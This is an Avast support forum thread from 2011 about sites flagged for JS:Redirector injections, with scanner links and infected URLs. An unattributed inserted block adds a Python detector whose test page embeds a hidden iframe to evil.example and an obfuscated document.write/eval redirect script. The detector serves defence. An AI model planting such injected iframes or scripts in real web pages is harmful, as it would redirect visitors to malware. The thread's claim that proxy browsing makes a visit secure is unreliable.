Avast WEBforum

Other => Viruses and worms => Topic started by: grinlord on September 09, 2011, 03:29:40 PM

Title: JS:Redirector blocking site. Others report clean.
Post by: grinlord on September 09, 2011, 03:29:40 PM
Hi. My friend runs a company with this website:

hxxp://www.nationwidegutters.co.uk/

However, when I try to visit it, Avast blocks it claiming an infection of JS:Redirector.
I don't have any viruses on my PC, I have checked it on other PCs also running Avast, they all show the same warning. I have asked the AVG online link scanner to check it, and it is reported clean. The web host also reports it clean.

Is this a false positive?
How do I enable access or get Avast to overcome this?

Thanks,
Alex.
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: polonus on September 09, 2011, 03:38:48 PM
The site is infected with malicious script:
Web site:   -http://www.nationwidegutters.co.uk/
status:   Site infected with malware
web trust:     Not Blacklisted
See: http://sucuri.net/malware/malware-entry-mwiframehd203
Make the link you gave non-click-through like -http or htxp or wXw

also see: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1315575290&type=js
where an iFrame is re-directing to: -http://maseoi1l4f.c0m.li/i/fttpp27vecher,
a known dangerous site, see: http://www.urlvoid.com/scan/maseoi1l4f.c0m.li

Inline suspicious script found by Unmask Parasites:
http://www.unmaskparasites.com/security-report/#report  = FOOTER virus-XSS worm code

polonus
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: Pondus on September 09, 2011, 03:44:20 PM
see attached screenshot (click to enlarge)

VirusTotal - HTML scan - 10/44
http://www.virustotal.com/file-scan/report.html?id=1d04b8aa4c424c8aed3fd8a7714bd0c0565035e476d50e8531cebc5a46361ea1-1315861827
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: grinlord on September 10, 2011, 11:49:24 AM
So if some other anti-virus programs don't detect this malicious script, are they just not doing their job properly?

The domain and web host have reported that there is nothing wrong with it.

What's the next step, show them the above code?
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: Asyn on September 10, 2011, 11:56:21 AM
> 1. So if some other anti-virus programs don't detect this malicious script, are they just not doing their job properly?
>
> 2. The domain and web host have reported that there is nothing wrong with it.
>
> 3. What's the next step, show them the above code?

1. Yep.
2. They're wrong.
3. Just link to this topic.
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: grinlord on September 10, 2011, 12:22:43 PM
Lol. Thus confirming my allegiance with Avast.
I have forwarded the link to this page. We shall see...
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: Pondus on September 10, 2011, 12:26:09 PM
Information for Website Owners      http://stopbadware.org/home/webmasters
Tips for Cleaning & Securing Your Website   http://www.stopbadware.org/home/security

Protect your interwebs with Sucuri   http://sucuri.net/signup - http://sucuri.net/
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: grinlord on September 12, 2011, 09:07:37 PM
Unfortunately, JustHost.com seem to be refusing to investigate the problem. They have asked us to visit http://www.google.com/webmasters/tools/ for the page to be reviewed.

I don't understand how that will help. There is malicious code in the site. That's surely the web host's responsibility. Perhaps they are assuming the code is stuck in Google's cache?
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: stavstav on September 28, 2011, 06:15:49 PM
Hi everyone

A question regarding this js:Redirector-KE [Trj] alert -

A forum I frequently visit has been infected by this script, how will it affect my personal computer if I do log in to the forum?
I did some reading about this, and from what I gather this is mainly about placing redirect scripts in web sites. So how does it affect me, as the end user?

Just to clarify: Avast IS blocking my access to the forum, but when I access a specific thread (from a link in a notification email) I do manage to access the site. And that has happened yesterday, when I wasn't aware of the problem. Then, when I tried accessing the forum from the browser, I got the "Threat has been detected" alert, and then I ran the scan - and Avast did find infected files on my computer.

So, my question is, how were those infected files affecting me? Assuming this is only redirect scripts, what could it have done to my computer?
And, should I wait for the site owner to clean those redirects, or is it no risk for me to access it anyway?

I hope this is not a stupid question to ask ;D It's just that I'm no security expert, and the only info I have is based on what I read in the last couple of days regarding this issue.
So I would love it if someone here could clarify this a bit more for me.

Thank you  8)
Stav.
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: polonus on September 28, 2011, 09:08:02 PM
Hi Stav,

I would rather go to the site via a proxy, like http://www.idoproxy.com/
Your visit is secure and you can normally visit it.
See: http://urlquery.net/report.php?id=3860
Also see the rescan I made: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1317237014&type=js
Level: 1) Url checked: (script source)
-http://www.nationwidegutters.co.uk/ac_runactivecontent.js (VBS-Malware gen)
Blank page / could not connect *
No ad codes identified
So I think the site has been cleansed now,

polonus
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: Asyn on September 28, 2011, 09:30:53 PM
> Hi Stav,
>
> I would rather go to the site via a proxy, like http://www.idoproxy.com/
> Your visit is secure and you can normally visit it.
> See: http://urlquery.net/report.php?id=3860
> Also see the rescan I made: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1317237014&type=js
> Level: 1) Url checked: (script source)
> -http://www.nationwidegutters.co.uk/ac_runactivecontent.js (VBS-Malware gen)
> Blank page / could not connect *
> No ad codes identified
> So I think the site has been cleansed now,
>
> polonus

Hi D.,
I don't think he's referring to the OP's site. ;)
asyn
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: stavstav on September 28, 2011, 10:56:50 PM
> Hi Stav,
>
> I would rather go to the site via a proxy, like http://www.idoproxy.com/
> Your visit is secure and you can normally visit it.
> See: http://urlquery.net/report.php?id=3860
> Also see the rescan I made: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1317237014&type=js
> Level: 1) Url checked: (script source)
> -http://www.nationwidegutters.co.uk/ac_runactivecontent.js (VBS-Malware gen)
> Blank page / could not connect *
> No ad codes identified
> So I think the site has been cleansed now,
>
> polonus
>
> Hi D.,
> I don't think he's referring to the OP's site. ;)
> asyn
True, I was referring to a different site (and I'm a she :)).
And the forum I'm talking about is still infected according to my Avast (but I know the site owner is working on cleaning it).
I was just wondering how will it affect me to access it anyway. Anyone knows?
What does this virus do to the user's computer?

Polonus, thank you for the proxy tip & link, didn't know I could do that. Cheers.
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: Asyn on September 28, 2011, 11:01:27 PM
> 1. and I'm a she :).
> 2. I was just wondering how will it affect me to access it anyway.

1. Sorry then.
2. Just don't go there until it's clean. ;)
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: stavstav on September 28, 2011, 11:07:57 PM
> 1. and I'm a she :).
> 2. I was just wondering how will it affect me to access it anyway.
>
> 1. Sorry then.
> 2. Just don't go there until it's clean. ;)
1. No problem at all :)
2. Yeah, but why? How is that redirecting script a problem for my personal computer? (Not trying to be a smartass :) just wanting to understand)
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: polonus on September 29, 2011, 01:30:13 AM
Hi stavstav,

Redirecting scripts can mean real trouble depending on what silent download site you are actually being redirected to by a particular malscript. If you give us the non-clickable URL written like hxtp or -http or wXw, we can scan the site for the actual redirecting script that is there, and give you an explanation about the established risks involved. I absolutely won't go to a site flagged in that way. That is why I advised that particular proxy, because the script will then stay at that security proxy site. You can also decide to disable javascript on the proxy site and then you do not run any risk whatsoever.
That is why a lot of educated browser users have the NoScript add-on installed in Firefox or the NotScripts extension in Google Chrome (easy to toggle, great for protection), so redirecting and other javascript malware cannot endanger their comp via their browsing.

Malcoded (obfuscated) javascript is one of the main online browsing threats; there are furthermore malicious iFrames (which also function through malcoded javascript), SQL attacks, etc.

So now I hope you understand why you have to take notice as avast rings an alarm via one of the shields while visiting a particular infected site. The avast guys do everything to be as accurate as can be in flagging these threat-sites, believe me. And I keep an eye out every day that there isn't a single suspicious URL that does not enter that avast sinkhole (as there are others like for instance Pondus, Asyn, spg Scott, and many others here),

polonus
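The two patterns polonus describes above, a concealed iFrame pointing off-site and an inline script built from eval/unescape/fromCharCode, can be checked for mechanically before anyone opens the page in a browser. The script below is an added example, not code from this thread or from any of the scanners linked in it. It feeds a constructed sample page through Python's standard HTML parser; the host evil.example and the script body are made up for illustration and are not the real injected code. It flags an iFrame only when it is both off-site and hidden (a visible third-party embed is normal), flags an inline script only when two or more obfuscation indicators stack up, and prints any URLs it finds defanged (hxxp, [.]) so the report can be pasted into a forum without making the links clickable.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a benign body with an injected hidden iframe and an
# obfuscated inline script of the kind flagged as JS:Redirector. The domain
# evil.example is a placeholder, not a real malware host. Raw string so the
# \x escapes stay literal, as they would in fetched page source.
SAMPLE_HTML = r"""
<html><body>
<h1>Nationwide Gutters</h1>
<p>Contact us for a quote.</p>
<script src="/ac_runactivecontent.js"></script>
<iframe src="http://evil.example/i/landing" width="1" height="1"
        style="visibility:hidden;position:absolute;left:-9999px"></iframe>
<script>
var s="\x3ciframe src\x3d\x22http://evil.example/i/landing\x22\x3e";
document.write(unescape(s));
eval(String.fromCharCode(118,97,114,32,120,61,49,59));
</script>
</body></html>
"""

_HIDDEN_STYLE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|left\s*:\s*-\d{3,}px|top\s*:\s*-\d{3,}px", re.I)
_INDICATORS = {
    "eval(": re.compile(r"\beval\s*\("),
    "unescape(": re.compile(r"\bunescape\s*\("),
    "String.fromCharCode": re.compile(r"String\.fromCharCode"),
    "document.write(": re.compile(r"document\.write\s*\("),
}
_HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
_URL = re.compile(r"https?://[^\s\"'<>\\]+")


class _Collector(HTMLParser):
    """Collects iframe attributes and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.inline_scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "script":
            self._in_script = "src" not in a  # external scripts have no inline body
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            if self._in_script:
                self.inline_scripts.append("".join(self._buf))
            self._in_script = False


def defang(url):
    """Make a URL non-clickable for posting: http -> hxxp, '.' -> '[.]'."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def _tiny(value):
    try:
        return float(value.rstrip("px%")) <= 1
    except ValueError:
        return False


def _iframe_reasons(attrs, site_host):
    reasons = []
    host = urlparse(attrs.get("src", "")).netloc.lower()
    if host and host != site_host.lower():
        reasons.append("off-site src " + host)
    if _tiny(attrs.get("width", "")) and _tiny(attrs.get("height", "")):
        reasons.append("1x1 or smaller")
    if _HIDDEN_STYLE.search(attrs.get("style", "")):
        reasons.append("hidden by CSS")
    return reasons


def scan_html(html, site_host):
    """Return a list of findings: hidden off-site iframes and obfuscated inline scripts."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    for attrs in c.iframes:
        reasons = _iframe_reasons(attrs, site_host)
        # Report only when the frame is both off-site and concealed.
        if any(r.startswith("off-site") for r in reasons) and len(reasons) > 1:
            findings.append({"kind": "hidden_iframe",
                             "url": defang(attrs.get("src", "")), "reasons": reasons})
    for body in c.inline_scripts:
        hits = [name for name, rx in _INDICATORS.items() if rx.search(body)]
        if len(_HEX_ESCAPE.findall(body)) >= 4:
            hits.append("hex-escaped string")
        if len(hits) >= 2:  # a single document.write is not suspicious on its own
            urls = sorted({defang(u) for u in _URL.findall(body)})
            findings.append({"kind": "obfuscated_script", "indicators": hits, "urls": urls})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "www.nationwidegutters.co.uk"):
        print(f)
```

To use this on a live page, fetch the HTML with a non-browser client (curl, or urllib with a plain User-Agent) rather than opening it in a browser, since the point is to read the injected code without executing it; the heuristics are deliberately conservative and will miss injections that avoid these particular indicators, so a clean result here is not a substitute for the online scanners linked in this thread.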
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: stavstav on September 29, 2011, 10:39:17 AM
> Hi stavstav,
>
> Redirecting scripts can mean real trouble depending on what silent download site you are actually being redirected to by a particular malscript. If you give us the non-clickable URL written like hxtp or -http or wXw, we can scan the site for the actual redirecting script that is there, and give you an explanation about the established risks involved. I absolutely won't go to a site flagged in that way. That is why I advised that particular proxy, because the script will then stay at that security proxy site. You can also decide to disable javascript on the proxy site and then you do not run any risk whatsoever.
> That is why a lot of educated browser users have the NoScript add-on installed in Firefox or the NotScripts extension in Google Chrome (easy to toggle, great for protection), so redirecting and other javascript malware cannot endanger their comp via their browsing.
>
> Malcoded (obfuscated) javascript is one of the main online browsing threats; there are furthermore malicious iFrames (which also function through malcoded javascript), SQL attacks, etc.
>
> So now I hope you understand why you have to take notice as avast rings an alarm via one of the shields while visiting a particular infected site. The avast guys do everything to be as accurate as can be in flagging these threat-sites, believe me. And I keep an eye out every day that there isn't a single suspicious URL that does not enter that avast sinkhole (as there are others like for instance Pondus, Asyn, spg Scott, and many others here),
>
> polonus
Thank you Polonus for the detailed reply, I appreciate that.

The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.

As for idoproxy - I forgot to update you guys, but accessing the abeforum via idoproxy still gets Avast to alert the threat and block it.
I did try marking idoproxy's "block scripts" option and then accessing the forum, and that worked ok for the forum's main page, but then I couldn't navigate to any sub forums / specific threads (the screen would remain empty, except for the "Home" link that leads back to idoproxy).

Again, thank you very much for the detailed answer.
I'll wait to see what your scan will yield.

Stav.
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: Asyn on September 29, 2011, 10:52:13 AM
> The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.

Sucuri: http://sucuri.net/malware/malware-entry-mwjs159 (See screenshot)
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: stavstav on September 29, 2011, 11:09:32 AM
> The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.
>
> Sucuri: http://sucuri.net/malware/malware-entry-mwjs159 (See screenshot)
Asyn, what does all this mean? (sorry, I'm clueless at that..  :))
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: Asyn on September 29, 2011, 11:12:13 AM
> The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.
>
> Sucuri: http://sucuri.net/malware/malware-entry-mwjs159 (See screenshot)
> Asyn, what does all this mean? (sorry, I'm clueless at that..  :))

Click on the link. ;)
Title: Re: JS:Redirector blocking site. Others report clean.
Post by: stavstav on September 29, 2011, 11:56:08 AM
> Click on the link. ;)
I'll clarify my question (I did click on the link before asking) -
what does "The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running." mean?
What is "the desktop" - is that my personal computer?
And what are "multiple AVs" (what's an AV)?

Title: Re: JS:Redirector blocking site. Others report clean.
Post by: polonus on September 29, 2011, 03:03:31 PM
Hi stavstav,

The message you clicked on is intended for webmasters whose websites got infected through an infected desktop computer with that particular script. The virus is a so-called password stealer and all of the website code will become infected through it eventually and then it will try to infect unprotected users that visit those infected sites to further infect, and so on and so forth.
So as long as the site is still infected with this particular malscript, please stay away from it and inform the webmaster there that he should cleanse his site or get help to get it cleansed. You could ask him to visit this thread for info.
He initially got infected through a wordpress vulnerability via timthumb.php: see: http://wewatchyourwebsite.com/wordpress/tag/string-prototype-testharc/
Despite the fact that the site is given clean here: http://urlquery.net/report.php?id=3949
and also here: http://siteinspector.comodo.com/public/reports/383186
Sucuri still marks it as infected here:
-http://www.abeforum.com/forum.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/register.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/faq.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/search.php?s=f8a062fcd4000c2527b41933393b23fa&do=getdaily&contenttype=vBForum_Post
-http://www.abeforum.com/calendar.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/memberlist.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/forumdisplay.php?s=f8a062fcd4000c2527b41933393b23fa&do=markread&markreadhash=guest
-http://www.abeforum.com/showgroups.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/search.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/search.php?s=f8a062fcd4000c2527b41933393b23fa for Google UA
The infected status is confirmed here: http://www.UnmaskParasites.com/security-report/?page=www.abeforum.com  verdict: 1 suspicious inline script found
The hoster of the site, Ace Data Centers, Inc. = AS11798, has 1967 blacklisted URLs (these security data are not reassuring). What is going on via these blacklisted URLs? A whole range of
online malevolence, like there are:
...malicious URLs? Yes  
...badware? Yes  
...botnet C&C servers? Yes  
...exploit servers? Yes  
...Zeus botnet servers? No  
...Current Events? Yes  
...phishing servers? Yes  
...spam servers? No  
...spam bots? Yes  
...spam activity? No  (above info found here: http://sitevet.com/db/asn/AS11798)

polonus